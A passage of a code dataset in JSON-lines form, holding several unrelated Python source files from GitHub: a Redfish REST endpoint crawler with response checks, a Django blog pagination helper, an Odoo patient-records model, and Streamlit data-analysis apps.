'':\n\t\t\tself._gen_rest_ver()\n\t\t\tpath=\"/{0}/v{1}\".format(self.cli_name, self._rest_version)\n\t\telse:\n\t\t\tcurrent_url=urlparse(path)\n\t\t\tif self._scheme == current_url.scheme or \":\" in current_url.netloc:\n\t\t\t\tself._netloc=current_url.netloc\n\t\t\t\treturn path\n\n\t\tnew_url_obj=self._empty_com._replace(scheme='http', netloc=self._netloc,path=path)\n\t\tself.new_url= new_url_obj.geturl()\n\t\treturn self.new_url\n\n\tdef get_path(self,url=None):\n\t\tif url==None:\n\t\t\turl=self.new_url\n\t\treturn urllib.parse.urlparse(url).path\n\n#url=GEN_URL('10.204.29.221')\n#print(url.get_url('/redfish/v2')\n\nclass GET_NODE(object):\n\tdef __init__(self,host,app_ver, port):\n\t\tself.host=host\n\t\tself.url_list=[]\n\t\tself.app_ver=app_ver\n\t\tself.port=port\n\t\tself.url_obj=GEN_URL(host=self.host, rest_version=self.app_ver,port=self.port)\n\n\tdef scan_node(self,node_path=None):\n\t\t\"\"\"\n\t\tnode_path: str, get the root url if node_path is None\n\t\t\"\"\"\n\t\tnode_url=self.url_obj.get_url(node_path)\n\t\t\n\t\tif CONF.REST.client_name in node_url:\n\t\t\tself.url_list.append(node_url)\n\t\t\tfor sub_node_path in self.__get_sub_node(node_url):\n\t\t\t\tif sub_node_path != \"\":\n\t\t\t\t\tself.scan_node(sub_node_path)\n\t\treturn self.url_list\n\n\tdef __get_sub_node(self,node_url):\n\t\turl_request=URL_REQUEST(node_url)\n\t\turl_request.get_req()\n\n\t\tall_dict_got=[]\n\t\tall_dict_got=url_request.all_dict_in_response\n\t\tsub_node_path_list=[]\n\t\tif len(all_dict_got)>0:\n\t\t\tfor sub_dict in all_dict_got:\n\t\t\t\tfor key_conf in CONF.REST.subnode_keys:\n\t\t\t\t\tfor key_host,value_host in sub_dict.items():\n\t\t\t\t\t\tif key_host == key_conf:\n\t\t\t\t\t\t\tif value_host not in sub_node_path_list and \\\n\t\t\t\t\t\t\t\tself.url_obj.get_url(value_host) not in self.url_list:\n\t\t\t\t\t\t\t\tsub_node_path_list.append(value_host)\n\t\t#sub_node_path_list.remove(self.url_obj.get_path(node_url))\n\t\treturn sub_node_path_list\n\t\t\n\nclass URL_REQUEST():\n\n\tdef __init__(self,url,username=None, password=None):\n\t\tif CONF.REST.client_name not in url:\n\t\t\traise ValueError(\"Not a valid redfish URL\")\n\t\tself.response_dict={}\n\t\tself.all_dict_in_response={}\n\t\tself.url=url.strip().replace(\" \", \"%20\")\n\t\tself.username=username\n\t\tself.password=password\n\t\tself.response_check=Reponse_check()\n\n\t@retry((HTTPError,socket.timeout,URLError,ValueError), \n\t\t\ttries=CONF.REQUEST.retries, delay=CONF.REQUEST.delay,\n\t\t\tbackoff=CONF.REQUEST.backoff, stoponerror=CONF.REQUEST.failonerror,\n\t\t\tlogger=logger)\n\tdef get_req(self,values=None):\n\t\tif values:\n\t\t\tif not isinstance(values,dict):\n\t\t\t\traise TypeError(\"POST data should be a python dict\")\n\t\t\telse:\n\t\t\t\tmsg=\"POST: Attempting to request URL: {0}\".format(self.url)\n\t\t\t\tdata = urllib.parse.urlencode(values)\n\t\t\t\tdata = data.encode('ascii') # data should be bytes\n\t\t\t\treq = urllib.request.Request(self.url, data)\n\t\telse:\n\t\t\tmsg=\"GET: Attempting to request URL: {0}\".format(self.url)\n\t\t\treq = urllib.request.Request(self.url)\n\t\tlogger.info(msg)\n\n\t\ttry:\n\t\t\tstart_time=datetime.now()\n\t\t\tresponse = urllib.request.urlopen(req)\n\t\t\t#Need close the urlopen here??? or just run Burn-in\n\t\texcept URLError as ue:\n\t\t\tif hasattr(ue,'reason'):\n\t\t\t\tmsg='Failed to reach {1}: {0}.'.format(ue.reason,self.url)\n\t\t\t\tlogger.error(msg)\n\t\t\telif hasattr(ue,'code'):\n\t\t\t\tmsg='The server couldn\\'t fulfill the request. Error code: {0}'\\\n\t\t\t\t\t.format(ue.code)\n\t\t\t\tlogger.error(msg)\n\t\t\t\tif ue.code==401:\n\t\t\t\t\tself.Send_Auth()\n\t\t\traise\n\t\telse:\n\t\t\tend_time=datetime.now()\n\t\t\tdata=response.read().decode('utf-8')\n\t\t\t#To run Burn-in test, keep response.close() commented\n\t\t\t#response.close()\n\n\t\t\trequest_time=(end_time-start_time).total_seconds()\n\t\t\tmsg=\"Spent {0:6f}s to get response from {1:s}\"\\\n\t\t\t\t.format(request_time,self.url)\n\t\t\tlogger.debug(msg)\n\t\t\tself.response_check.request_time_check(request_time,self.url)\n\n\t\ttry:\n\t\t\tself.response_dict=json.loads(data)\n\t\t\tself.all_dict_in_response=json._default_decoder.all_dicts\n\t\texcept ValueError as ve:\n\t\t\tmsg=\"Get invaild feedback from RESTful server when open URL:{0}, \\\n\t\t\t\tinfor:{1}\".format(self.url,data)\n\t\t\tlogger.error(msg)\n\t\t\traise\n\t\t#self.response_check.confcompare(self.response_dict,CONF.MAIN.value_file)\n\t\tself.response_check.confcompare(self.response_dict['Name'],\\\n\t\t\t\t\tself.all_dict_in_response,CONF.MAIN.value_file)\n\t\treturn self.response_dict\n\n\tdef Send_Auth(self):\n\t\tif not (self.username and self.password):\n\t\t\traise ValueError(\"Must specify both username and password, \\\n\t\t\t\tas Server asks Authentication!\")\n\t\tpassword_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n\t\tpassword_mgr.add_password(None, self.url, self.username, self.password)\n\t\n\t\tauthhandler = urllib.request.HTTPBasicAuthHandler(password_mgr)\n\t\topener = urllib.request.build_opener(authhandler)\n\t#opener.open(url)\n\t\turllib.request.install_opener(opener)\n\nclass Reponse_check(object):\n\tdef __init__(self):\n\t\tpass\n\tdef confcompare(self, current_url_name, all_dict_got, conf_file):\n\t\tif not os.path.isfile(conf_file):\n\t\t\tmsg='Didn\\'t find compare files to check the response data.'\n\t\t\tlogger.error(msg)\n\t\tconf = configparser.ConfigParser()\n\t\tconf.optionxform = str\n\t\tconf.read(conf_file)\n\t\tif current_url_name in conf:\n\t\t\tfor dict_got in all_dict_got:\n\t\t\t\tfor key_got, value_get in dict_got.items():\n\t\t\t\t\tfor check_item,check_spec in conf[current_url_name].items():\n\t\t\t\t\t\tif key_got==check_item:\n\t\t\t\t\t\t\tif \"<\" in check_spec:\n\t\t\t\t\t\t\t\tself.__threshold_check(current_url_name,check_item, check_spec, dict_got[check_item])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif str(dict_got[check_item])==check_spec.strip():\n\t\t\t\t\t\t\t\t\tmsg=\"{0}: Value mathced for key: {1}, got: {2}\"\\\n\t\t\t\t\t\t\t\t\t\t.format(current_url_name,check_item, check_spec.strip())\n\t\t\t\t\t\t\t\t\tlogger.info(msg)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tmsg=\"{0}: Value mismatched for key: {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t\t\t\t\t\t.format(current_url_name,check_item, check_spec.strip(),str(dict_got[check_item]))\n\t\t\t\t\t\t\t\t\tlogger.error(msg)\n\t\n\tdef request_time_check(self, request_time,url):\n\t\tmsg=\"RESTful Server takes '{0}' to respond URL:{1}\".format(request_time,url)\n\t\tif request_time>CONF.REQUEST.http_time_warn and request_timeCONF.REQUEST.http_time_error:\n\t\t\tlogger.error(msg)\n\n\tdef __threshold_check(self, current_url_name, key, threshold, value):\n\t\tthh=re.split('<',threshold)\n\t\tthh_n=[]\n\t\ti=0\n\t\tfor th in thh:\n\t\t\tif 'x'==th.strip() or 'X'==th.strip():\n\t\t\t\tx=i\n\t\t\t\tthh_n.append(value)\n\t\t\telse:\n\t\t\t\tthh_n.append(ast.literal_eval(th.strip()))\n\t\t\ti+=1\n\t\n\t\tthh_n.sort()\n\t\tsi=thh_n.index(value)\n\t\n\t\toffset=si-x\n\t\tif offset==0:\n\t\t\tmsg=\"{0}: check {1} successfully, got: {2}\"\\\n\t\t\t\t.format(current_url_name,key, value)\n\t\t\tlogger.info(msg)\n\t\telif offset==1:\n\t\t\tmsg=\"{0}: Warning, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.warning(msg)\n\t\telif offset==2:\n\t\t\tmsg=\"{0}: Error, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.error(msg)\n\t\telif offset==-1:\n\t\t\tmsg=\"{0}: Warning, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.warning(msg)\n\t\telif offset==-2:\n\t\t\tmsg=\"{0}: Error, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.error(msg)\n","repo_name":"trelay/CRTT","sub_path":"CRTT/get_nodes.py","file_name":"get_nodes.py","file_ext":"py","file_size_in_byte":9557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35424135899","text":"from .models import Blog,BlogType\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom mysite.forms import LoginForm,RegForm\n#公用函数\nEach_page_num = 4\n\ndef get_blogs_common_list(request,blogs_all):\n context = {}\n\n paginator = Paginator(blogs_all,Each_page_num)#分页器 10页\n page_num = request.GET.get('page',1) #get 请求 ?page=1\n page_of_blogs = paginator.get_page(page_num)\n\n currentr_page_num = page_of_blogs.number#获取当前页码\n a = list(range(max(currentr_page_num-2,1),currentr_page_num))\n b = list(range(currentr_page_num,min(currentr_page_num+2,paginator.num_pages) + 1))\n page_range = a+b\n\n #加上省略页码标记\n if page_range[0]-1>=2:\n page_range.insert(0,'...')\n if paginator.num_pages - page_range[-1] >=2:\n page_range.append('...')\n \n # 首页尾页\n if page_range[0] != 1:\n page_range.insert(0,1)\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n\n #获取类别blog各个类别的数量\n #第一种方法\n # BlogType.objects.annotate(blog_count=Count('blog'))\n\n #第二种方法\n '''\n blog_types = BlogType.objects.all()\n blog_types_list = []\n for blog_type in blog_types:\n blog_type.blog_count = Blog.objects.filter(blog_type = blog_type).count()\n blog_types_list.append(blog_type)\n '''\n #context['blog_types'] = blog_types_list\n #获取日期归档的blog数量\n blog_dates = Blog.objects.dates('created_time','month','DESC')\n blog_dates_dict = {}\n for blog_date in blog_dates:\n blog_count = Blog.objects.filter(created_time__year=blog_date.year,created_time__month=blog_date.month).count()\n blog_dates_dict[blog_date] = blog_count\n\n #第二种方法仍是使用 annotate方法 不一样的是 是使用\n #db = Blog.objects.filter(created_time__year=blog_date.year,created_time__month=blog_date.month)\n #db.annotate\n\n\n context['blog_types'] = BlogType.objects.annotate(blog_count=Count('blog'))\n context['page_of_blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_dates'] = blog_dates_dict\n\n return context\n\ndef pro_loginform_template(request):\n login_form = LoginForm()\n reg_form = RegForm()\n\n return {'login_form':login_form,'reg_form':reg_form}","repo_name":"hearecho/mysite","sub_path":"blog/common_func.py","file_name":"common_func.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14383553009","text":"from odoo import api, fields, models, _\nfrom datetime import datetime\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n is_patient = fields.Boolean(\n string='Es Paciente',\n required=False)\n medical_insurance_id = fields.Many2one(\n comodel_name='medical.insurance',\n string='Seguro',\n required=False)\n medical_category_id = fields.Many2one(\n comodel_name='medical.insurance.category',\n string='Categoria de seguro',\n required=False, domain=\"[('medical_insurance_id', '=', medical_insurance_id)]\")\n medical_insurance_no = fields.Char(\n string='No. Seguro',\n required=False)\n date_expire_medical_insurance = fields.Date(\n string='Fecha de vencimiento de seguro',\n required=False)\n birth_date = fields.Date(\n string='Nacimiento',\n required=False)\n type_blood = fields.Selection(\n string='Tipo de sangre',\n selection=[\n ('a+', 'A+'),\n ('a-', 'A-'),\n ('b+', 'B+'),\n ('b-', 'B-'),\n ('ab+', 'AB+'),\n ('ab-', 'AB-'),\n ('o+', 'O+'),\n ('o-', 'O-'),\n ],\n required=False, )\n gender = fields.Selection(\n string='Sexo',\n selection=[('male', 'Masculino'),\n ('female', 'Femenino'), ],\n required=False, )\n tipo_contribuyente = fields.Selection(\n string='Tipo Contribuyente',\n selection=[('consumo', 'Consumidor Final'),\n ('contribuyente', 'Contribuyente'), ],\n required=False, )\n exam_ids = fields.One2many(\n comodel_name='patient.physical.pressure.exam',\n inverse_name='patient_id',\n string='Examenes',\n required=False)\n pathological_background_ids = fields.One2many(\n comodel_name='allergy.disability.pathological.background',\n inverse_name='patient_id',\n string='Patologia',\n required=False, domain=\"[('type_diseases', '=', 'diseases')]\")\n disability_ids = fields.One2many(\n comodel_name='disability.background',\n inverse_name='patient_id',\n string='Discapacidad',\n required=False, domain=\"[('type_diseases', '=', 'disability')]\")\n allergy_ids = fields.One2many(\n comodel_name='allergy.background',\n inverse_name='patient_id',\n string='Alergia',\n required=False, domain=\"[('type_diseases', '=', 'allergy')]\")\n consultation_ids = fields.One2many(\n comodel_name='medical.consultation',\n inverse_name='patient_id',\n string='Consultas',\n required=False)\n consultation_count = fields.Integer(\n string='Consultation_count',\n required=False, compute='_compute_consultation_count')\n prescription_ids = fields.One2many(\n comodel_name='medical.prescription',\n inverse_name='patient_id',\n string='Recetas',\n required=False)\n prescription_count = fields.Integer(\n string='Prescription_count',\n required=False, compute='_compute_prescription_count')\n indication_ids = fields.One2many(\n comodel_name='labs.indications',\n inverse_name='patient_id',\n string='Laboratorio',\n required=False)\n indication_count = fields.Integer(\n string='Indication_count',\n required=False, compute='_compute_indication_count')\n result_lab_ids = fields.One2many(\n comodel_name='labs.indications',\n inverse_name='patient_id',\n string='Laboratorio',\n required=False)\n result_lab_count = fields.Integer(\n string='Indication_count',\n required=False, compute='_compute_result_lab_count')\n tracking_patient_ids = fields.One2many(\n comodel_name='tracking.patient',\n inverse_name='patient_id',\n string='Seguimiento/Citas',\n required=False)\n tracking_count = fields.Integer(\n string='Tracking Count',\n required=False)\n\n @api.depends('tracking_patient_ids')\n def _compute_tracking_count(self):\n for rec in self:\n rec.tracking_count = len(rec.tracking_patient_ids)\n\n def action_view_tracking_patient(self):\n '''\n This function returns an action that displays the opportunities from partner.\n '''\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.tracking_patient_action')\n action['context'] = {'default_patient_id': self.id,\n 'default_name': self.name,\n 'default_user_id': self.env.user.id}\n action['domain'] = [('patient_id', '=', self.id)]\n return action\n\n def action_view_consultation(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.medical_consultation_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n action['context'] = {'default_patient_id': self.id}\n return action\n\n def action_view_prescription(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.prescription_view_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n return action\n\n def action_view_indication(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.labs_indications_view_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n return action\n\n def action_view_result_lab(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.result_labs_view_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n return action\n\n @api.depends('consultation_ids')\n def _compute_consultation_count(self):\n for rec in self:\n rec.consultation_count = len(rec.consultation_ids)\n\n @api.depends('result_lab_ids')\n def _compute_result_lab_count(self):\n for rec in self:\n rec.result_lab_count = len(rec.result_lab_ids)\n\n @api.depends('prescription_ids')\n def _compute_prescription_count(self):\n for rec in self:\n rec.prescription_count = len(rec.prescription_ids)\n\n @api.depends('indication_ids')\n def _compute_indication_count(self):\n for rec in self:\n rec.indication_count = len(rec.indication_ids)\n\n def add_exam(self):\n\n wizard = self.env['add.exam.wizard'].create({\n\n 'patient_id': self.id,\n })\n\n return {\n 'name': _('Agregar'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'add.exam.wizard',\n 'view_mode': 'form',\n 'res_id': wizard.id,\n 'target': 'new'\n }\n\nclass AddExamWizard(models.TransientModel):\n _name = 'add.exam.wizard'\n _description = 'Add Exam Wizard'\n\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\n height = fields.Float(\n string='Altura',\n required=False)\n weight = fields.Float(\n string='Peso',\n required=False)\n waist = fields.Float(\n string='Cintura',\n required=False)\n systolic_pressure = fields.Float(\n string='Presion S. Sistolica',\n required=False)\n diastolic_pressure = fields.Float(\n string='Presion S. Diastolica',\n required=False)\n\n def add_this(self):\n\n if not self.medical_consultation_id:\n self.env['patient.physical.pressure.exam'].create({\n 'height': self.height,\n 'weight': self.weight,\n 'waist': self.waist,\n 'systolic_pressure': self.systolic_pressure,\n 'diastolic_pressure': self.diastolic_pressure,\n 'patient_id': self.patient_id.id\n })\n else:\n self.env['patient.physical.pressure.exam'].create({\n 'height': self.height,\n 'weight': self.weight,\n 'waist': self.waist,\n 'systolic_pressure': self.systolic_pressure,\n 'diastolic_pressure': self.diastolic_pressure,\n 'patient_id': self.patient_id.id,\n 'medical_consultation_id': self.medical_consultation_id.id\n })\n\n\nclass PatientPhysicalPressureExam(models.Model):\n _name = 'patient.physical.pressure.exam'\n _description = 'Patient Physical & Pressure Exam'\n _order = 'date desc'\n\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n height = fields.Float(\n string='Altura | pies',\n required=False)\n weight = fields.Float(\n string='Peso | libras',\n required=False)\n waist = fields.Float(\n string='Cintura | pulgadas',\n required=False)\n systolic_pressure = fields.Float(\n string='Presion S. Sistolica | mmHg',\n required=False)\n diastolic_pressure = fields.Float(\n string='Presion S. Diastolica | mmHg',\n required=False)\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\nclass PathologicalBackground(models.Model):\n _name = 'allergy.disability.pathological.background'\n _description = 'Pathological Background'\n\n diseases_id = fields.Many2one(\n comodel_name='diseases.diseases',\n string='Enfermedad',\n required=True, domain=\"[('type_diseases', '=', 'diseases')]\")\n type_diseases = fields.Selection(\n string='Type Diseases',\n selection=[('diseases', 'Enfermedad'),\n ('disability', 'Discapacidad'),\n ('allergy', 'Alergia'),\n ],\n required=False, )\n\n origin = fields.Selection(\n string='Origen',\n selection=[('patient', 'Paciente'),\n ('family', 'Familia'), ],\n required=False, )\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n state = fields.Selection(\n string='Estado',\n selection=[\n ('detected', 'Detectato'),\n ('healthy', 'Sano'),\n ('in_treatment', 'En tratamiento'),\n ('not_treated', 'No atendido'),\n ],\n required=True, )\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\nclass DisabilityBackground(models.Model):\n _name = 'disability.background'\n _description = 'Disability Background'\n\n diseases_id = fields.Many2one(\n comodel_name='diseases.diseases',\n string='Enfermedad',\n required=True, domain=\"[('type_diseases', '=', 'disability')]\")\n type_diseases = fields.Selection(\n string='Type Diseases',\n selection=[('diseases', 'Enfermedad'),\n ('disability', 'Discapacidad'),\n ('allergy', 'Alergia'),\n ],\n required=False, )\n\n origin = fields.Selection(\n string='Origen',\n selection=[('patient', 'Paciente'),\n ('family', 'Familia'), ],\n required=False, )\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n state = fields.Selection(\n string='Estado',\n selection=[\n ('detected', 'Detectato'),\n ('healthy', 'Sano'),\n ('in_treatment', 'En tratamiento'),\n ('not_treated', 'No atendido'),\n ],\n required=True, )\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\nclass AllergyBackground(models.Model):\n _name = 'allergy.background'\n _description = 'Allergy Background'\n\n diseases_id = fields.Many2one(\n comodel_name='diseases.diseases',\n string='Enfermedad',\n required=True, domain=\"[('type_diseases', '=', 'allergy')]\")\n type_diseases = fields.Selection(\n string='Type Diseases',\n selection=[('diseases', 'Enfermedad'),\n ('disability', 'Discapacidad'),\n ('allergy', 'Alergia'),\n ],\n required=False, )\n\n origin = fields.Selection(\n string='Origen',\n selection=[('patient', 'Paciente'),\n ('family', 'Familia'), ],\n required=False, )\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n state = fields.Selection(\n string='Estado',\n selection=[\n ('detected', 'Detectato'),\n ('healthy', 'Sano'),\n ('in_treatment', 'En tratamiento'),\n ('not_treated', 'No atendido'),\n ],\n required=True, )\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\n\n","repo_name":"WildyEstephan/SaludPlus","sub_path":"base_salud_plus/models/patient.py","file_name":"patient.py","file_ext":"py","file_size_in_byte":14355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29595669793","text":"import pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nimport numpy as np\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport time\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nimport plotly_express as px\r\nimport seaborn as sns\r\nfrom sklearn import metrics\r\n\r\ndef app():\r\n header = st.beta_container()\r\n dataset = st.beta_container()\r\n datapreprocessing = st.beta_container()\r\n features = st.beta_container()\r\n graphs = st.beta_container()\r\n model_training = st.beta_container()\r\n\r\n @st.cache\r\n def get_data(filename):\r\n data1 = pd.read_csv(filename, sep=',')\r\n\r\n return data1\r\n @st.cache\r\n def feat(data2):\r\n x = data2.describe()\r\n return x\r\n @st.cache\r\n def pre_data(filename1):\r\n\r\n data2 = filename1.copy()\r\n return data2\r\n\r\n @st.cache\r\n def grapy(data4):\r\n df = data4\r\n numeric_cols = list(df.select_dtypes(['float64', 'int64']).columns)\r\n text_data = df.select_dtypes(['object'])\r\n text_cols = text_data.columns\r\n return df, numeric_cols, text_cols\r\n\r\n with header:\r\n st.markdown(\r\n '

Analysis

',\r\n unsafe_allow_html=True)\r\n st.subheader(\"- Let's understand and analyize it.\")\r\n\r\n with dataset:\r\n with st.beta_expander(\"Dataset-\"):\r\n st.header(\"*Online Dataset*\")\r\n dataset = get_data('train.csv')\r\n\r\n if st.button('View Data'):\r\n latest_iteration = st.empty()\r\n for i in range(100):\r\n latest_iteration.info(f' {i + 1} %')\r\n time.sleep(0.05)\r\n time.sleep(0.2)\r\n latest_iteration.empty()\r\n st.info(\"train.csv\")\r\n st.write(dataset.head(709))\r\n x_val = dataset.shape[0]\r\n y_val = dataset.shape[1]\r\n st.write(\"Data-shape :\", x_val, \"Features :\", y_val)\r\n\r\n with datapreprocessing:\r\n with st.beta_expander(\"Pre-Processed Data-\"):\r\n st.header(\"Data after Pre-processing:\")\r\n dd = dataset.copy()\r\n data = copy.deepcopy(pre_data(dd))\r\n st.write(data.head(150))\r\n\r\n st.write('Number of participants: ', len(data))\r\n data.head()\r\n\r\n st.write('Is there any missing value? ', data.isnull().values.any())\r\n st.write('How many missing values? ', data.isnull().values.sum())\r\n data.dropna(inplace=True)\r\n st.write('Number of participants after eliminating missing values: ', len(data))\r\n\r\n # For ease of calculation lets scale all the values between 0-1 and take a sample of 5000\r\n if st.button(\"Final Data\"):\r\n d1 = data.copy()\r\n d1.drop(d1.columns[7], axis=1, inplace=True)\r\n st.write(d1.head(150))\r\n x_valnew = d1.shape[0]\r\n y_valnew = d1.shape[1]\r\n st.write(\"Data-shape :\", x_valnew, \"Features :\", y_valnew)\r\n with features:\r\n with st.beta_expander(\"Features-\"):\r\n st.header(\"*Features Description:*\")\r\n y3 = copy.deepcopy(data)\r\n y3.drop(y3.columns[7], axis=1, inplace=True)\r\n y = copy.deepcopy(feat(y3))\r\n st.write(y)\r\n with graphs:\r\n with st.beta_expander(\"Graphical Visualization-\"):\r\n st.header(\"*Graphical representation:*\")\r\n df, numeric_cols, text_cols = grapy(y3)\r\n\r\n col3, col4 = st.beta_columns((1, 3))\r\n\r\n with col3:\r\n chart_select = st.selectbox(label=\"Select the chart-type\", options=[\r\n 'Scatter-plots', 'Histogram', 'Distplot', 'Box-plot', 'Violin-plot', 'Heat-map'\r\n ])\r\n if chart_select == 'Scatter-plots':\r\n st.subheader(\"Scatter-plot Settings:\" )\r\n x_values = st.selectbox('X-axis', options=numeric_cols)\r\n y_values = st.selectbox('Y-axis', options=numeric_cols)\r\n with col4:\r\n plot = px.scatter(data_frame=df, x=x_values, y=y_values)\r\n st.plotly_chart(plot)\r\n if chart_select == 'Histogram':\r\n st.subheader(\"Histogram Settings:\")\r\n x_values = st.selectbox('value', options=numeric_cols)\r\n x_val = np.array(df[x_values])\r\n fig, ax = plt.subplots(figsize=(15, 9))\r\n sns.set_style(\"dark\")\r\n sns.set_style(\"darkgrid\")\r\n sns.histplot(data=x_val, kde=True)\r\n with col4:\r\n st.pyplot(fig)\r\n if chart_select == 'Distplot':\r\n st.subheader(\"Distplot Settings:\")\r\n x_values = st.selectbox('value', options=numeric_cols)\r\n x_val = np.array(df[x_values])\r\n fig, ax = plt.subplots(figsize=(15, 9))\r\n sns.set_style(\"dark\")\r\n sns.set_style(\"darkgrid\")\r\n sns.distplot(x_val)\r\n with col4:\r\n st.pyplot(fig)\r\n if chart_select == 'Box-plot':\r\n st.subheader(\"Box-plot Settings:\" )\r\n x_values = st.selectbox('X-axis', options=numeric_cols)\r\n y_values = st.selectbox('Y-axis', options=numeric_cols)\r\n with col4:\r\n plot = px.box(data_frame=df, x=x_values, y=y_values)\r\n st.plotly_chart(plot)\r\n if chart_select == 'Violin-plot':\r\n st.subheader(\"Violin-plot Settings:\" )\r\n x_values = st.selectbox('X-axis', options=numeric_cols)\r\n y_values = st.selectbox('Y-axis', options=numeric_cols)\r\n with col4:\r\n plot = px.violin(data_frame=df, x=x_values, y=y_values, points='all', box=True)\r\n st.plotly_chart(plot)\r\n if chart_select == 'Heat-map':\r\n st.subheader('Heat-map')\r\n\r\n data_val = y3\r\n fig, ax = plt.subplots(figsize=(25, 10))\r\n sns.set_style(\"darkgrid\")\r\n sns.set_style(\"dark\")\r\n sns.set_theme(style='darkgrid',palette='deep')\r\n sns.heatmap(data_val.corr(), ax=ax, annot=True, annot_kws={\"size\": 9}, fmt='.1f', linewidths=.5,\r\n cbar=True, xticklabels=1, yticklabels=1,\r\n cbar_kws={\"orientation\": \"vertical\"}, cmap='BuPu')\r\n\r\n with col4:\r\n st.pyplot(fig)\r\n with model_training:\r\n #col4, col5 = st.beta_columns((3, 4))\r\n with st.beta_expander(\"Model Training-\"):\r\n st.header(\"*Accuracy of Model:*\")\r\n classifier_name = st.selectbox(\"Select Classifier :\", (\"Logistic Regression\", \"Support Vector Machine\"))\r\n if classifier_name == \"Logistic Regression\":\r\n if st.button(\"Score of Logistic Regression\"):\r\n time.sleep(0.1)\r\n xy = st.balloons()\r\n testdata = pd.read_csv('test.csv')\r\n outputdata = pd.read_csv('output.csv')\r\n output = outputdata.values\r\n outputdata.drop(outputdata.columns[:1], axis=1, inplace=True)\r\n testdata.drop(testdata.columns[:7], axis=1, inplace=True)\r\n st.write('Prediction accuracy of test data : ')\r\n st.write('{:.2%}\\n'.format(metrics.accuracy_score(testdata, outputdata)))\r\n from sklearn.metrics import cohen_kappa_score\r\n cohen_score = cohen_kappa_score(testdata, outputdata)\r\n st.write('Cohen-Score of test data:')\r\n st.write(cohen_score)\r\n time.sleep(1)\r\n xy.empty()\r\n\r\n if classifier_name == \"Support Vector Machine\":\r\n if st.button(\"Score of Support Vector Machine\"):\r\n time.sleep(0.1)\r\n xy = st.balloons()\r\n testdata = pd.read_csv('svm-test.csv')\r\n outputdata = pd.read_csv('svm-output.csv')\r\n output = outputdata.values\r\n outputdata.drop(outputdata.columns[:1], axis=1, inplace=True)\r\n testdata.drop(testdata.columns[:7], axis=1, inplace=True)\r\n st.write('Prediction accuracy of test data : ')\r\n st.write('{:.2%}\\n'.format(metrics.accuracy_score(testdata, outputdata)))\r\n from sklearn.metrics import cohen_kappa_score\r\n cohen_score = cohen_kappa_score(testdata, outputdata)\r\n st.write('Cohen-Score of test data:')\r\n st.write(cohen_score)\r\n time.sleep(1)\r\n xy.empty()\r\n","repo_name":"Manish1986451/personality-prediction","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":9193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42421482121","text":"# Import the required libraries and dependencies\nimport pandas as pd\nimport hvplot.pandas\nimport datetime as dt\nimport holoviews as hv\nfrom prophet import Prophet\nimport yfinance as yf\nimport streamlit as st\nfrom sklearn.metrics 